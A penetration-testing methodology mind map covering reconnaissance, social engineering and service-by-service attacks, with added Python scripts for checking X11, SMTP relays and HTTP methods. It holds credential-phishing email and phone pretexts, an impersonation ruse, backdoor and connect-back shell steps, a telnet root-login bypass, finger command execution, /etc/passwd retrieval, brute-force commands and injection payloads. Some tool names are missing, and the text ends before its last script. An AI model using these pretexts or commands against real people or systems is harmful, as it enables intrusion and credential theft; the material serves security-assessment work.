
Penetration Testing Framework 0.58 (mind map)



X11 port 6000+ open (display :N listens on TCP 6000+N)

X11 Enumeration

List open windows

Authentication method: xauth (MIT-MAGIC-COOKIE, per-client cookie) or xhost (host-based access list)

X11 Exploitation

xwd, xwd -display <IP>:0 -root -out <file> (dumps the remote root window to a file; view it with xwud -in <file>)

Keystrokes: capture received and transmitted key events from the open display


xhost + (disables access control entirely: any host may connect to the display)

Examine Configuration Files


/usr/lib/X11/xdm




/usr/lib/X11/xdm/xdm-config, check that DisplayManager*authorize is enabled (on/true), otherwise xdm-managed displays start without cookie authorization
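The check behind the whole X11 node is whether the server lets a client in with no cookie at all, which is what an `xhost +` server does. The script below is an added example, not part of the Penetration Testing Framework: it sends the X11 connection-setup request with an empty authorization name and data and classifies the server's reply (Success / Failed / Authenticate). The reply-construction helper exists only so the parser can be exercised offline; the host and display number passed on the command line are placeholders.

```python
"""Check whether an X server accepts connections without authentication.

Added example (not part of the original framework). Sends the X11
connection-setup request with empty authorization, as an 'xhost +' server
would accept, and classifies the server's reply.
"""
import socket
import struct

X11_BASE_PORT = 6000  # display :N listens on TCP 6000+N

# Connection setup request: byte order 'l' (little-endian), pad, protocol
# major 11 / minor 0, auth-name length 0, auth-data length 0, 2 pad bytes.
NO_AUTH_SETUP = struct.pack("<cxHHHHxx", b"l", 11, 0, 0, 0)

SUCCESS, FAILED, AUTHENTICATE = 1, 0, 2


def parse_setup_reply(reply: bytes) -> dict:
    """Classify an X11 connection-setup reply.

    Returns {'status': 'open'|'denied'|'auth-required'|'unknown', 'reason': str}.
    """
    if len(reply) < 8:
        return {"status": "unknown", "reason": "short reply"}
    code = reply[0]
    if code == SUCCESS:
        # Accepted without a cookie: anyone on the network can dump the
        # display (xwd), read keystrokes or inject input.
        major, minor = struct.unpack_from("<HH", reply, 2)
        return {"status": "open", "reason": f"protocol {major}.{minor}, no auth required"}
    if code == FAILED:
        reason_len = reply[1]                      # reason string follows the 8-byte header
        reason = reply[8:8 + reason_len].decode("ascii", "replace")
        return {"status": "denied", "reason": reason}
    if code == AUTHENTICATE:
        extra_len = struct.unpack_from("<H", reply, 6)[0] * 4   # length in 4-byte units
        reason = reply[8:8 + extra_len].rstrip(b"\x00").decode("ascii", "replace")
        return {"status": "auth-required", "reason": reason}
    return {"status": "unknown", "reason": f"status byte {code}"}


def probe_display(host: str, display: int = 0, timeout: float = 3.0) -> dict:
    """Connect to host:<6000+display>, send the no-auth setup request, classify the reply."""
    with socket.create_connection((host, X11_BASE_PORT + display), timeout=timeout) as s:
        s.sendall(NO_AUTH_SETUP)
        return parse_setup_reply(s.recv(4096))


def make_failed_reply(reason: str) -> bytes:
    """Constructed test data: a 'Failed' reply as an xhost-protected server sends it."""
    body = reason.encode() + b"\x00" * (-len(reason) % 4)      # reason padded to 4 bytes
    return struct.pack("<BBHHH", FAILED, len(reason), 11, 0, len(body) // 4) + body


if __name__ == "__main__":
    import sys
    host = sys.argv[1]                                  # placeholder target
    display = int(sys.argv[2]) if len(sys.argv) > 2 else 0
    print(probe_display(host, display))
```

A `denied` result with "No protocol specified" or "Client is not authorized to connect to Server" means xhost/xauth is doing its job; `open` means the display is world-readable and the xwd and keystroke steps above apply without further work.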

pwdump [-h][-o][-u][-p] machineName

Nabil contributed the AS/400 section.

Client Side Security

Back end files

.exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

Set objShell = CreateObject("WScript.Shell")

Check visible areas for sensitive information.


txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt

Pre-Inspection Visit - template

Network Footprinting (Reconnaissance). The tester attempts to gather as much information as possible about the selected network. Reconnaissance takes two forms, passive and active. Passive reconnaissance is the best starting point, as it normally gives intrusion detection systems and the network's other protective controls nothing to see: it consists of collecting publicly available information with a web browser, from newsgroups and similar sources. Active reconnaissance is more intrusive and may show up in audit logs; examples are an attempted DNS zone transfer or a social engineering approach.


Authoritative Bodies: IANA - Internet Assigned Numbers Authority; ICANN - Internet Corporation for Assigned Names and Numbers; NRO - Number Resource Organisation; RIRs - Regional Internet Registries: AFRINIC - African Network Information Centre; APNIC - Asia Pacific Network Information Centre (National Internet Registries: APJII, CNNIC, JPNIC, KRNIC, TWNIC, VNNIC); ARIN - American Registry for Internet Numbers; LACNIC - Latin America & Caribbean Network Information Centre; RIPE NCC - Réseaux IP Européens Network Coordination Centre

Websites: Central Ops (Domain Dossier, Email Dossier); DNS Stuff - online DNS one-stop shop, able to perform a great many disparate DNS queries; Fixed Orbit - Autonomous System lookups and other online tools; Geektools; IP2Location - limited free IP lookups, displaying geolocation, ISP details and other pertinent information; Kartoo - metasearch engine that visually presents its results; shared-domain lookup site - gives details of shared domains on the queried IP and, conversely, IP to DNS resolution; alternative shared-domain site - can be used if the above is down; Netcraft - online search tool for host information; Passive DNS Replication - finds shared domains based on supplied IP addresses (note: the website used by the nmap hostmap.nse script); Robtex - DNS and AS lookups with a graphical display of the results showing pointers, A and MX records and AS connectivity (note: can be unreliable with old entries, verify with CentralOps); traceroute directory - a site listing a large number of links to online traceroute resources; Wayback Machine - stores older versions of websites, a good comparison tool and excellent resource for previously removed data

Tools, Cheops-ng, Country whois, Domain Research Tool, Firefox Plugins, AS Number, Shazou, Firecat Suite, Gnetutil, Goolag Scanner, Greenwich, Maltego, GTWhois, Sam Spade, Smart whois, SpiderFoot

Internet Search

General Information, Web Investigator, Tracesmart, Friends Reunited, Ebay - profiles etc.

Financial, EDGAR - Company information, including real-time filings. US, Google Finance - General Finance Portal, Hoovers - Business Intelligence, Insight and Results. US and UK, Companies House UK, Land Registry UK

Phone book/ Electoral Roll Information: 123people; Electoral Roll search (UK); 411 - online White Pages and Yellow Pages (US); background check, phone number lookup, trace email, criminal record, find people, cell phone number search, license plate search (US); residential and business directories (UK); Pipl; Spokeo; Yasni; Zabasearch - people search engine (US)

Generic Web Searching: Code Search; forum entries; Google Hacking Database; Google (email addresses, contact details, newsgroups/forums); blog search (Yammer, Google Blog Search, Technorati); Jaiku; Twitter Network Browser; search engine comparison/ aggregator sites (Clusty, Grokker, Zuula, Exalead); Delicious

Metadata Search. Metadata visualisation sites: TouchGraph Google Browser, Kartoo. Tools: Bashitsu (svn checkout of the project, then cat filename | strings | bashitsu-extract-names); Bintext; ExifTool (exiftool -common directory; exiftool -r -w .txt -common directory); FOCA (online and offline versions); Hachoir; Infocrobes; Libextractor (extract -b filename; extract filename; extract -B country_code filename); Metadata Extraction Tool (extract.bat <arg1> <arg2> <arg3>); Metagoofil (metagoofil -d target_domain -l max_no_of_files -f all (or pdf,doc,xls,ppt) -o output_file.html -t directory_to_download_files_to); OOMetaExtractor; The Revisionist (./therev '' @/directory; ./therev ''; ./therev 'linux' en); Wvware. Wikipedia metadata search: Wikiscanner, Wikipedia username checker

Social/ Business Networks by region. Africa: BlackPlanet. Australia: Bebo. Belgium: Netlog. Holland: Hyves. Hungary: iWiW. Iran: Cloob. Japan: Mixi. Korea: CyWorld. Poland: Grono, Nasza-klasa. Russia: Odnoklassniki, Vkontakte. Sweden: LunarStorm. UK: FriendsReunited et al, Badoo, FaceParty. US: Classmates, Facebook, Friendster, MySpace, Windows Live Spaces. Assorted: Buzznet, Care2, Habbo, Hi5, LinkedIn, MocoSpace, Naymz, Orkut, Passado, Tagged, Twitter, Xanga, Yahoo! 360°, Xing

Resources, OSINT, International Directory of Search Engines

DNS Record Retrieval from publicly available servers

Types of Information Records: SOA - start of authority; names the server that is authoritative for the zone. MX - the mail exchanger server(s) for a host or domain. NS - the name server(s) for a host or domain. A - address record mapping a host name to an IPv4 address; a host needs one for its name to resolve via DNS. PTR - reverse record mapping an IP address back to a host name. SRV - service location record. HINFO - host information record with CPU type and operating system. TXT - generic text record. CNAME - canonical name; allows additional names/ aliases to point at a host. RP - responsible person for the domain.

Database Settings, Version.bind, Serial, Refresh, Retry, Expiry, Minimum

Sub Domains

Internal IP ranges, Reverse DNS for IP Range

Zone Transfer

Social Engineering

Remote. Phone scenarios. IT Department: "Hi, it's Zoe from the helpdesk. I am doing a security audit of the network and I need to re-synchronise the Active Directory usernames and passwords. This is so that your logon process in the morning receives no undue delays." If you are calling from a mobile number, explain that the helpdesk has been issued a mobile phone for 'on call' personnel. Results: contact details (name, phone number, email, room number, department, role).
Email scenarios. (1) "Hi there, I am currently carrying out an Active Directory Health Check for TARGET COMPANY and require to re-synchronise some outstanding accounts on behalf of the IT Service Desk. Please reply to me detailing the username and password you use to logon to your desktop in the morning. I have checked with MR JOHN DOE, the IT Security Advisor, and he has authorised this request. I will then populate the database with your account details ready for re-synchronisation with Active Directory such that replication of your account will be re-established (this process is transparent to the user and so requires no further action from yourself). We hope that this exercise will reduce the time it takes for some users to logon to the network. Best Regards, Andrew Marks." (2) "Good Morning, The IT Department had a critical failure last night regarding remote access to the corporate network; this will only affect users that occasionally work from home. If you have remote access, please email me with your username and access requirements, e.g. what remote access system did you use? VPN and IP address etc., and we will reset the system. We are also using this 'opportunity' to increase the remote access users, so if you believe you need to work from home occasionally, please email me your usernames so I can add them to the correct groups. If you wish to retain your current credentials, also send your password. We do not require your password to carry out the maintenance, but it will change if you do not inform us of it. We apologise for any inconvenience this failure has caused and are working to resolve it as soon as possible. We also thank you for your continued patience and help. Kindest regards, Lee [EMAIL SIGNATURE]." Software. Results: contact details (name, phone number, email, room number, department, role), other.

Local. Personas: name (suggest the same first name), phone (give a work mobile, but remember they have it!), email (have a suitable email address), business cards (get cards printed). Contact details to collect: name, phone number, email, room number, department, role. Scenarios. New IT employee: "Hi, I'm the new guy in IT and I've been told to do a quick survey of users on the network. They give all the worst jobs to the new guys, don't they? Can you help me out on this?" Get the following information, with an "any problems with it we can help with?" slant: username, domain, remote access (type - modem/VPN), remote email (OWA), most used software, any comments about the network, any additional software they would like, what they think about the security on the network (password complexity etc.). Then give reasons as to why they have complexity for passwords, try to get someone to give you their password, and explain how you can make it more secure. "Thanks very much and you'll see the results on the company boards soon." Fire Inspector: turning up on the premise of a snap fire inspection, in line with local government initiatives on fire safety in the workplace. Ensure you have a suitable appearance: high visibility jacket, clipboard, ID card (fake). Check for: number of fire extinguishers, pressure, type; fire exits, accessibility etc. Look for any information you can get; try to get on your own, without supervision! Results: maps, satellite imagery (Google Maps), building layouts, other.

Dumpster Diving

Rubbish Bins

Contract Waste Removal

eBay ex-stock sales, e.g. second-hand hard disks

Web Site copy


Teleport Pro

Black Widow

Discovery & Probing. Enumeration serves two distinct purposes in an assessment: OS fingerprinting and identifying the remote applications being served. OS fingerprinting (TCP/IP stack fingerprinting) is the process of determining the operating system of a remote host by analysing packets received from it. There are two approaches: active (e.g. nmap) and passive (e.g. p0f). Passive fingerprinting works only from packets the host sends anyway and transmits nothing. Active fingerprinting is noisy: it sends crafted packets to the remote host and examines the reply, or the lack of one. Different operating systems respond differently to certain packets (the response is governed by the relevant RFC plus any proprietary behaviour the vendor, notably Microsoft, has enabled), so custom packets may be sent to tell them apart. The applications served by a host are indicated by its open ports; port scanning builds up a picture of what is running so the test can be tailored accordingly.

Default Port Lists



Enumeration tools and techniques - the vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.

General Enumeration Tools
nmap: nmap -n -A -PN -p- -T aggressive -iL nmap.targetlist -oX nmap.syn.results.xml; nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results; nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results; nmap -A -sS -PN -n --script all --reason ip_address; extract live hosts from saved normal output: grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
netcat: nc -v -n IP_Address port; nc -v -w 2 -z IP_Address port_range/port_number
amap: amap -bqv IP_Address 80; amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
xprobe2: xprobe2 IP_Address
sinfp: ./ -i IP_Address -p port
nbtscan: nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
hping: hping ip_address
scanrand: scanrand ip_address:all
unicornscan: unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/CIDR_NET_MASK:S-E
netenum: netenum network/netmask timeout
fping: fping -a -d hostname (or Network/Subnet_Mask)

Firewall Specific Tools: firewalk - firewalk -p [protocol] -d [destination_port] -s [source_port] [gateway_IP] [metric_IP] (the gateway to walk through, then a host beyond it); ftester - on host 1: ./ftestd -i eth0 -v; on host 2: ./ftest -f ftest.conf -v -d 0.01; then ./freport ftest.log ftestd.log

Default Passwords (Examine list), Passwords A, Passwords B, Passwords C, Passwords D, Passwords E, Passwords F, Passwords G, Passwords H, Passwords I, Passwords J, Passwords K, Passwords L, Passwords M, Passwords N, Passwords O, Passwords P, Passwords R, Passwords S, Passwords T, Passwords U, Passwords V, Passwords W, Passwords X, Passwords Y, Passwords Z, Passwords (Numeric)

Active Hosts

Open TCP Ports

Closed TCP Ports

Open UDP Ports

Closed UDP Ports

Service Probing, SMTP Mail Bouncing, Banner Grabbing, Other, HTTP, Commands, JUNK / HTTP/1.0, HEAD / HTTP/9.3, OPTIONS / HTTP/1.0, HEAD / HTTP/1.0, Extensions, WebDAV, ASP.NET, Frontpage, OWA, IIS ISAPI, PHP, OpenSSL, HTTPS, Use stunnel to encapsulate traffic., SMTP, POP3, FTP, If banner altered, attempt anon logon and execute: 'quote help' and 'syst' commands.

ICMP Responses, Type 3 (Port Unreachable), Type 8 (Echo Request), Type 13 (Timestamp Request), Type 15 (Information Request), Type 17 (Subnet Address Mask Request), Responses from broadcast address

Source Port Scans, TCP/UDP 53 (DNS), TCP 20 (FTP Data), TCP 80 (HTTP), TCP/UDP 88 (Kerberos)

Firewall Assessment, Firewalk, TCP/UDP/ICMP responses

OS Fingerprint


Daytime port 13 open

nmap nse script, daytime

FTP port 21 open

Fingerprint server: telnet ip_address 21 (banner grab); run ftp ip_address. Check for anonymous access: ftp ip_address, Username: anonymous (or anon), Password: any email-style string is normally accepted

Password guessing, Hydra brute force, medusa, Brutus

Examine configuration files, ftpusers, ftp.conf, proftpd.conf


SSH port 22 open

Fingerprint server, telnet ip_address 22 (banner grab), scanssh, scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

Password guessing, ssh root@ip_address, guess-who, ./b -l username -h ip_address -p 22 -2 < password_file_location, Hydra brute force, brutessh, Ruby SSH Bruteforcer

Examine configuration files, ssh_config, sshd_config, authorized_keys, ssh_known_hosts, .shosts

SSH Client programs, tunnelier, winsshd, putty, winscp

Telnet port 23 open

Fingerprint server: telnet ip_address (banner grab). Common banner list (OS / banner):
Solaris 8 / SunOS 5.8
Solaris 2.6 / SunOS 5.6
Solaris 2.4 or 2.5.1 / Unix(r) System V Release 4.0 (hostname)
SunOS 4.1.x / SunOS Unix (hostname)
FreeBSD / FreeBSD/i386 (hostname) (ttyp1)
NetBSD / NetBSD/i386 (hostname) (ttyp1)
OpenBSD / OpenBSD/i386 (hostname) (ttyp1)
Red Hat 8.0 / Red Hat Linux release 8.0 (Psyche)
Debian 3.0 / Debian GNU/Linux 3.0 / hostname
SGI IRIX 6.x / IRIX (hostname)
IBM AIX 4.1.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
IBM AIX 4.2.x or 4.3.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
Nokia IPSO / IPSO (hostname) (ttyp0)
Cisco IOS / User Access Verification
Livingston ComOS / ComOS - Livingston PortMaster
Tool: telnetfp

Password Attack, Untitled, Hydra brute force, Brutus, telnet -l "-froot" hostname (Solaris 10+)

Examine configuration files, /etc/inetd.conf, /etc/xinetd.d/telnet, /etc/xinetd.d/stelnet

Sendmail Port 25 open

Fingerprint server, telnet ip_address 25 (banner grab)

Mail Server Testing. Enumerate users: VRFY username (confirms whether a mailbox exists); EXPN alias (expands a mailing list or alias to its members); both allow account enumeration. Mail spoof test: HELO anything; MAIL FROM: spoofed_address; RCPT TO: valid_mail_account; DATA; .; QUIT. Mail relay tests (each MAIL FROM below is paired with an RCPT TO at a domain the server does not serve; a 250 to that RCPT TO means the server relays): identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain> (baseline, should be accepted for the server's own domain); unknown domain - mail from: <user@unknown_domain>; domain not present - mail from: <user@localhost>; domain not supplied - mail from: <user>; use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>

Examine Configuration Files
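The VRFY/EXPN and relay checks above are a fixed script of SMTP commands and response codes, so they are easy to automate. The following is an added example, not code from the Penetration Testing Framework: a minimal SMTP client that runs the user-enumeration and the five relay cases and decides from the reply codes. The `FakeSmtpServer` at the bottom is a constructed stand-in for a typical hardened MTA (VRFY answers, relaying refused) so the logic runs offline; the target domain, IP and user names are placeholders.

```python
"""User enumeration and open-relay checks from the SMTP node.

Added example, not code from the original framework. Works over any pair
of file-like objects, so the same logic runs against a real socket or the
constructed in-memory fake server below.
"""
import io
import socket


def relay_cases(target_domain, target_ip, external="recipient_domain"):
    """(label, MAIL FROM, RCPT TO) for each relay test listed in the node."""
    return [
        ("identical to/from", f"nobody@{target_domain}", f"nobody@{target_domain}"),
        ("unknown domain", "user@unknown_domain", f"nobody@{external}"),
        ("domain not present", "user@localhost", f"nobody@{external}"),
        ("domain not supplied", "user", f"nobody@{external}"),
        ("target IP literal", f"user@[{target_ip}]", f"nobody@{external}"),
    ]


class SmtpSession:
    """One command in, one (possibly multi-line) reply out."""

    def __init__(self, rfile, wfile):
        self.rfile, self.wfile = rfile, wfile
        self.banner = self._reply()

    def _reply(self):
        lines = []
        while True:
            line = self.rfile.readline().decode(errors="replace").rstrip("\r\n")
            lines.append(line)
            if len(line) < 4 or line[3] != "-":      # "250-" continues, "250 " ends
                break
        return int(lines[-1][:3]), "\n".join(lines)

    def cmd(self, text):
        self.wfile.write((text + "\r\n").encode())
        self.wfile.flush()
        return self._reply()


def enumerate_users(sess, names):
    """VRFY/EXPN: a 250/251/252 reply confirms the account or alias exists."""
    found = {}
    for name in names:
        for verb in ("VRFY", "EXPN"):
            code, text = sess.cmd(f"{verb} {name}")
            if code in (250, 251, 252):
                found[name] = text
                break
    return found


def relay_check(sess, target_domain, target_ip):
    """Run every relay case; returns {label: (rcpt_accepted, last reply line)}."""
    results = {}
    for label, sender, rcpt in relay_cases(target_domain, target_ip):
        sess.cmd("RSET")
        sess.cmd(f"MAIL FROM:<{sender}>")
        code, text = sess.cmd(f"RCPT TO:<{rcpt}>")
        results[label] = (code == 250, text.splitlines()[-1])
    return results


def is_open_relay(results):
    """Open relay = any external RCPT accepted; the identical to/from case is only the baseline."""
    return any(ok for label, (ok, _) in results.items() if label != "identical to/from")


def connect(host, port=25, helo="tester.example"):
    """Real target: open the socket and say HELO (host/helo are placeholders)."""
    sock = socket.create_connection((host, port), timeout=10)
    sess = SmtpSession(sock.makefile("rb"), sock.makefile("wb"))
    sess.cmd(f"HELO {helo}")
    return sess


class FakeSmtpServer:
    """Constructed test double: VRFY leaks account names, RCPT to foreign domains is refused."""

    def __init__(self, local="target.example", users=("root", "postmaster")):
        self.local, self.users = local, set(users)
        self.out = io.BytesIO(b"220 mail.target.example ESMTP\r\n")

    def readline(self):
        return self.out.readline()

    def write(self, data):
        verb, _, arg = data.decode().strip().partition(" ")
        if verb in ("VRFY", "EXPN"):
            reply = f"250 <{arg}@{self.local}>" if arg in self.users else "550 unknown user"
        elif verb == "RCPT":
            addr = arg.split("<", 1)[1].rstrip(">")
            reply = "250 OK" if addr.endswith("@" + self.local) else "554 relaying denied"
        else:
            reply = "250 OK"
        pos = self.out.tell()                   # append the reply, keep the read cursor
        self.out.seek(0, io.SEEK_END)
        self.out.write((reply + "\r\n").encode())
        self.out.seek(pos)

    def flush(self):
        pass
```

Against a live host: `sess = connect("mail.target.example")`, then `enumerate_users(sess, [...])` and `is_open_relay(relay_check(sess, "target.example", "192.0.2.10"))`. Note that some MTAs accept every RCPT TO and only reject at DATA, so a 250 here is a strong indicator but the DATA step of the spoof test above is the confirmation.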

DNS port 53 open

Fingerprint server/ service. host: host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]; -v verbose format; -t (query type) allows a user to specify a record type i.e. A, NS, or PTR; -a same as -t ANY; -l zone transfer (if allowed); -f save to a specified filename. nslookup: nslookup [-option ...] [host-to-find | - [server]]. dig: dig [@server] [-b address] [-c class] [-f filename] [-k filename] [-p port#] [-t type] [-x addr] [-y name:key] [-4] [-6] [name] [type] [class] [queryopt...]. whois: -h use the named host to resolve the query; -a use ARIN to resolve the query; -r use RIPE to resolve the query; -p use APNIC to resolve the query; -Q perform a quick lookup

DNS Enumeration, Bile Suite, perl [website] [project_name], perl [website] [input file], perl [input file] [true domain file] [output file] <range>, perl [input file] [true domain file] [output file], perl [input file] [output file], perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names], perl [ip_address_file] [output_file], perl jarf-rev [subnetblock] [nameserver], txdns, txdns -rt -t domain_name, txdns -x 50 -bb domain_name, nmap nse scripts, dns-random-srcport, dns-random-txid, dns-recursion, dns-zone-transfer

Examine Configuration Files, host.conf, resolv.conf, named.conf

TFTP port 69 open

TFTP Enumeration: tftp ip_address PUT local_file; tftp ip_address GET conf.txt (or other files); Solarwinds TFTP server; tftp -i <IP> GET /etc/passwd (old Solaris)

TFTP Bruteforcing, TFTP bruteforcer, Cisco-Torch

Finger Port 79 open

User enumeration: finger 'a b c d e f g h'; finger **; nmap nse script: finger

Command execution, finger "|/bin/", finger "|/bin/ls -a /"

Finger Bounce, finger user@host@victim, finger @internal@external

Web Ports 80,8080 etc. open

Fingerprint server, Telnet ip_address port, Firefox plugins, All, firecat, Specific, add n edit cookies, asnumber, header spy, live http headers, shazou, web developer

Crawl website, lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source, httprint, Metagoofil, -d [domain] -l [no. of] -f [type] -o results.html

Web Directory enumeration, Nikto, nikto [-h target] [options], DirBuster, Wikto, Goolag Scanner

Vulnerability Assessment
Manual Tests: default passwords; install backdoors (ASP, assorted, Perl, PHP, Python, TCL); Bash connect-back shell (GnuCitizen and Neohapsis variants), attack box: nc -l -p Port -vvv
Method Testing: nc IP_Address Port, then HEAD / HTTP/1.0; OPTIONS / HTTP/1.0; PROPFIND / HTTP/1.0; TRACE / HTTP/1.1; PUT http://Target_URL/FILE_NAME; POST http://Target_URL/FILE_NAME HTTP/1.x
Upload Files: curl -u <username:password> -T file_to_upload <Target_URL>; curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>; upload script: -h target -r /remote_file_name -f local_file_name; WebDAV: cadaver
View Page Source: hidden values, developer remarks, extraneous code, passwords!
Input Validation Checks:
NULL or null - possible error messages returned
' , " , ; , <! - breaks an SQL string or query; used for SQL, XPath and XML injection tests
- , = , + , " - used to craft SQL injection queries
' , & , ! , ¦ , < , > - used to find command execution vulnerabilities
"><script>alert(1)</script> - basic cross-site scripting check
%0d%0a - carriage return (%0d) line feed (%0a): HTTP response splitting, i.e. Content-Length: 0 followed by an injected HTTP/1.1 200 OK / Content-Type: text/html / Content-Length: 47 / <html>blah</html>; cache poisoning
%7f , %ff - byte-length overflows; maximum 7- and 8-bit values
-1, other - integer and underflow vulnerabilities
%n , %x , %s - format string vulnerabilities
../ - directory traversal vulnerabilities
% , _ , * - wildcard characters can present DoS issues or information disclosure
Ax1024+ - overflow vulnerabilities
Automated table and column iteration: script invoked with the injectable URL, suffixed ,COLUMN,3+FROM+TABLE--
Vulnerability Scanners: Acunetix, Grendelscan, NStealth, Obiwan III, w3af
Specific Applications/ Server Tools: Domino - dominoaudit [options] -h <IP>; Joomla - cms_few ./ <site-name>, joomsq ./ <IP>, joomlascan, joomscan ./ -u "" -o site.txt -p, jscan -f hostname (shell.txt required); ASP.NET - http://target/app/filename.aspx (options i.e. -bf); vBulletin - <host> <port> -v, -update; ZyXEL - snmpwalk -v2c -c public IP_Address, snmpget -v2c -c public IP_Address
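The Method Testing step above is usually done by hand in netcat; the script below is an added example, not part of the Penetration Testing Framework, that sends the same OPTIONS, TRACE and PUT requests over a raw socket and judges the replies: which methods the Allow header admits, whether TRACE echoes the request (cross-site tracing), and whether PUT created the file. The HTTP responses in the test are constructed; host, port and the `ptf_test.txt` filename are placeholders.

```python
"""HTTP method testing (OPTIONS / TRACE / PUT) with raw requests.

Added example, not code from the original framework. The judgement
functions take a full response string so they can be unit-tested on
constructed replies; probe() does the network part.
"""
import socket

RISKY_METHODS = {"PUT", "DELETE", "TRACE", "PROPFIND", "PROPPATCH",
                 "MKCOL", "COPY", "MOVE", "CONNECT"}


def raw_request(host, port, request, timeout=5.0):
    """Send one pre-formatted HTTP request and read until the server closes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request.encode("iso-8859-1"))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("iso-8859-1")


def split_response(raw):
    """Return (status_code, headers_dict, body); header names lower-cased."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def allowed_methods(options_response):
    """Parse the Allow (or old Public) header of an OPTIONS reply; return (all, risky)."""
    _, headers, _ = split_response(options_response)
    allow = headers.get("allow") or headers.get("public") or ""
    methods = {m.strip().upper() for m in allow.split(",") if m.strip()}
    return methods, sorted(methods & RISKY_METHODS)


def trace_reflects(trace_response, marker):
    """TRACE is exploitable (XST) when the server echoes our request, marker header included."""
    status, headers, body = split_response(trace_response)
    return (status == 200 and marker in body
            and "message/http" in headers.get("content-type", ""))


def put_accepted(put_response):
    """200/201/204 after PUT means the server stored our file."""
    status, _, _ = split_response(put_response)
    return status in (200, 201, 204)


def probe(host, port=80, path="/"):
    """Run the three checks against host:port (placeholders) and summarise."""
    marker = "X-PTF-Marker: method-test"
    opts = raw_request(host, port, f"OPTIONS {path} HTTP/1.0\r\nHost: {host}\r\n\r\n")
    trace = raw_request(host, port,
                        f"TRACE {path} HTTP/1.1\r\nHost: {host}\r\n{marker}\r\n"
                        "Connection: close\r\n\r\n")
    body = "ptf method test"
    put = raw_request(host, port,
                      f"PUT {path}ptf_test.txt HTTP/1.0\r\nHost: {host}\r\n"
                      f"Content-Length: {len(body)}\r\n\r\n{body}")
    methods, risky = allowed_methods(opts)
    return {"allow": sorted(methods), "risky": risky,
            "trace_xst": trace_reflects(trace, marker), "put": put_accepted(put)}
```

A server that answers OPTIONS with `Allow: GET, HEAD` but still honours PUT exists, so `put_accepted` is checked independently of the Allow header rather than inferred from it; the same goes for TRACE, which is why the marker header is looked for in the echoed body rather than trusting the method list.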

Proxy Testing, Burpsuite, Crowbar, Interceptor, Paros, Requester Raw, Suru, WebScarab

Examine configuration files. Generic: examine httpd.conf/ Windows config files. JBoss: JMX Console http://<IP>:8080/jmx-console/, WAR file deployment. Joomla: configuration.php, diagnostics.php. Mambo: configuration.php. WordPress: setup-config.php, wp-config.php. ZyXEL: /WAN.html (contains PPPoE ISP password), /WLAN_General.html and /WLAN.html (contains WEP key), /rpDyDNS.html (contains DDNS credentials), /Firewall_DefPolicy.html (firewall), /CF_Keyword.html (content filter), /RemMagWWW.html (remote management), /rpSysAdmin.html (system), /LAN_IP.html (LAN), /NAT_General.html (NAT), /ViewLog.html (logs), /rpFWUpload.html (tools), /DiagGeneral.html (diagnostic), /RemMagSNMP.html (SNMP passwords), /LAN_ClientList.html (current DHCP leases); config backups: /RestoreCfg.html, /BackupCfg.html. Note: the backup config files are not human readable and the ZyXEL Config Reader tool is required to break out possible admin credentials and other important settings.

Examine web server logs: c:\winnt\system32\Logfiles\W3SVC1; awk '{print $3,$11}' filename | sort | uniq -c (check the #Fields: header of the IIS log to confirm which columns $3 and $11 are; the field order depends on the site's logging configuration)
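Because IIS lets the administrator choose which W3C fields are logged and in what order, a hard-coded `$3,$11` can silently pick the wrong columns. The script below is an added example, not part of the Penetration Testing Framework: it reads the `#Fields:` header and keys every record by name, then produces the client/status counts the awk pipeline was after and flags clients that used WebDAV or diagnostic methods or piled up 4xx errors. The log lines in `SAMPLE_LOG` are constructed sample data in the IIS 6 W3C format.

```python
"""Summarise an IIS W3C extended log by field name rather than column number.

Added example, not code from the original framework. SAMPLE_LOG is
constructed test data in IIS 6 W3C extended format.
"""
from collections import Counter

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-03-02 00:00:01
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-03-02 00:00:01 10.0.0.5 GET /default.htm - 80 - 192.0.2.7 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2009-03-02 00:00:02 10.0.0.5 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 80 - 198.51.100.9 Nikto/2.02 404 0 2
2009-03-02 00:00:03 10.0.0.5 PROPFIND / - 80 - 198.51.100.9 Nikto/2.02 207 0 0
2009-03-02 00:00:04 10.0.0.5 OPTIONS / - 80 - 198.51.100.9 Nikto/2.02 200 0 0
2009-03-02 00:00:05 10.0.0.5 GET /exchange/ - 80 CORP\\jdoe 192.0.2.7 Mozilla/4.0+(compatible;+MSIE+6.0) 401 2 2148074254
"""

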